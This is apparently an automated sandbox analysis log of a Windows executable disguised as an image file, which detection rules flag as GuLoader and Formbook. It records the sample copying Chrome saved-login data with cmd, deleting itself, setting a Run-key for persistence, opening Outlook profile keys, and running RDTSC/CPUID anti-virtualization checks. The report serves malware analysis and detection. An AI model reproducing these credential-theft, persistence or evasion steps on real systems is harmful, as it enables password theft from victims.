      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3825191_2_1F382519
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F371D1B1_2_1F371D1B
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2B0D401_2_1F2B0D40
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F37E5811_2_1F37E581
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F35E58A1_2_1F35E58A
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F361DE31_2_1F361DE3
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F37D5D21_2_1F37D5D2
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F36FDDB1_2_1F36FDDB
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F36F42B1_2_1F36F42B
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2C740C1_2_1F2C740C
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2D14101_2_1F2D1410
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E547E1_2_1F2E547E
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F382C9A1_2_1F382C9A
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F381C9F1_2_1F381C9F
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3734901_2_1F373490
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3744EF1_2_1F3744EF
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F37DCC51_2_1F37DCC5
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2DFB401_2_1F2DFB40
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E4B961_2_1F2E4B96
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2BEBE01_2_1F2BEBE0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E63C21_2_1F2E63C2
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E523D1_2_1F2E523D
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F38E2141_2_1F38E214
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F370A021_2_1F370A02
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E4A5B1_2_1F2E4A5B
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2D42B01_2_1F2D42B0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F381A991_2_1F381A99
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3822DD1_2_1F3822DD
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E71101_2_1F2E7110
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E594B1_2_1F2E594B
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F38D9BE1_2_1F38D9BE
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E61801_2_1F2E6180
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3819E21_2_1F3819E2
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3761DF1_2_1F3761DF
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2EE0201_2_1F2EE020
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E00211_2_1F2E0021
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F37D0161_2_1F37D016
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E10701_2_1F2E1070
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3618B61_2_1F3618B6
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2CA0801_2_1F2CA080
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3828E81_2_1F3828E8
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E48CB1_2_1F2E48CB
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_005621071_2_00562107
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_005625011_2_00562501
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_00562F1C1_2_00562F1C
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: String function: 1F30DDE8 appears 36 times
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: String function: 1F2BB0E0 appears 168 times
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vp2d3tbpivbxnjq8.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000000.00000002.836191179.000000000040E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamevlc.exe vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000000.00000002.839659007.00000000029D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.919434255.000000001F53F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000000.835287219.000000000040E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamevlc.exe vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915366086.00000000000E9000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.918159349.000000001EE00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeBinary or memory string: OriginalFilenamevlc.exe vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/8@11/3
      Source: C:\Windows\SysWOW64\netsh.exeFile created: C:\Users\user\AppData\Roaming\083NCCSS
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2972:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeFile created: C:\Users\user\AppData\Local\Temp\~DF2C70F95705FF5AF2.TMP
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\netsh.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeVirustotal: Detection: 44%
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeMetadefender: Detection: 29%
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeReversingLabs: Detection: 48%
      Source: unknownProcess created: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe'
      Source: unknownProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe
      Source: unknownProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe'
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeProcess created: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe'
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe'
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe'
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe'
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6db7cd52-e3b7-4ecc-bb1f-388aeef6bb50}\InProcServer32
      Source: C:\Windows\SysWOW64\netsh.exeFile written: C:\Users\user\AppData\Roaming\083NCCSS\083logri.ini
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.888783969.0000000007010000.00000002.00000001.sdmp
      Source: Binary string: netsh.pdb source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915324983.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: netsh.pdbGCTL source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915324983.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.918924312.000000001F3AF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.888783969.0000000007010000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: Process Memory Space: vp2d3tbpivbxnjq8.exe PID: 4920, type: MEMORY
      Source: Yara match | File source: Process Memory Space: vp2d3tbpivbxnjq8.exe PID: 2408, type: MEMORY
      Source: Yara match | File source: Process Memory Space: IMAGE-M265NV_20200329_180550_0001 from google.exe PID: 3728, type: MEMORY
      Source: Yara match | File source: Process Memory Space: vp2d3tbpivbxnjq8.exe PID: 4668, type: MEMORY
      Source: Yara match | File source: Process Memory Space: IMAGE-M265NV_20200329_180550_0001 from google.exe PID: 5024, type: MEMORY
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 0_2_00402019 push esp; mov dword ptr [esp], ecx 0_2_0040201A
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 0_2_00404681 push FFFFFFCDh; iretd 0_2_00404683
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 0_2_029F2F1C push esp; iretd 0_2_029F3137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 0_2_029F2107 push esp; iretd 0_2_029F3137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 0_2_029F2501 push esp; iretd 0_2_029F3137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 0_2_029F3165 push esp; iretd 0_2_029F3137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 1_2_1F30DE2D push ecx; ret 1_2_1F30DE40
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 1_2_00563165 push esp; iretd 1_2_00563137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 1_2_00562107 push esp; iretd 1_2_00563137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 1_2_00562501 push esp; iretd 1_2_00563137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 1_2_00562F1C push esp; iretd 1_2_00563137
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Code function: 14_2_02092501 push esp; iretd 14_2_02093137
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Code function: 14_2_02092107 push esp; iretd 14_2_02093137
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Code function: 14_2_02092F1C push esp; iretd 14_2_02093137
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Code function: 14_2_02093165 push esp; iretd 14_2_02093137

      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\L5jwtnd\vp2d3tbpivbxnjq8.exe

      Source: C:\Windows\SysWOW64\netsh.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run B8Q89L80V0HD
      Source: C:\Windows\SysWOW64\netsh.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run B8Q89L80V0HD

      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 0_2_029F24B3 0_2_029F24B3
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 1_2_005624B3 1_2_005624B3
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Code function: 14_2_020924B3 14_2_020924B3
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | RDTSC instruction interceptor: First address: 00000000029F24B7 second address: 00000000029F24D7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c clc 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 cld 0x00000016 bt ecx, 1Fh 0x0000001a jc 00007F7540659072h 0x0000001c popad 0x0000001d lfence 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | RDTSC instruction interceptor: First address: 00000000029F24D7 second address: 00000000029F24B7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F754070A45Dh 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F754070A483h 0x0000001b push ecx 0x0000001c call 00007F754070A4AFh 0x00000021 lfence 0x00000024 clc 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | RDTSC instruction interceptor: First address: 00000000005624B7 second address: 00000000005624D7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c clc 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 cld 0x00000016 bt ecx, 1Fh 0x0000001a jc 00007F7540659072h 0x0000001c popad 0x0000001d lfence 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | RDTSC instruction interceptor: First address: 00000000005624D7 second address: 00000000005624B7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F754070A45Dh 0x00000011 lfence 0x00000014 clc 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | RDTSC instruction interceptor: First address: 00000000004098B4 second address: 00000000004098BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | RDTSC instruction interceptor: First address: 0000000000409B1E second address: 0000000000409B24 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 0000000002D998B4 second address: 0000000002D998BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 0000000002D99B1E second address: 0000000002D99B24 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | RDTSC instruction interceptor: First address: 00000000020924B7 second address: 00000000020924D7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c clc 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 cld 0x00000016 bt ecx, 1Fh 0x0000001a jc 00007F7540659072h 0x0000001c popad 0x0000001d lfence 0x00000020 rdtsc
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | RDTSC instruction interceptor: First address: 00000000020924D7 second address: 00000000020924B7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F754070A45Dh 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx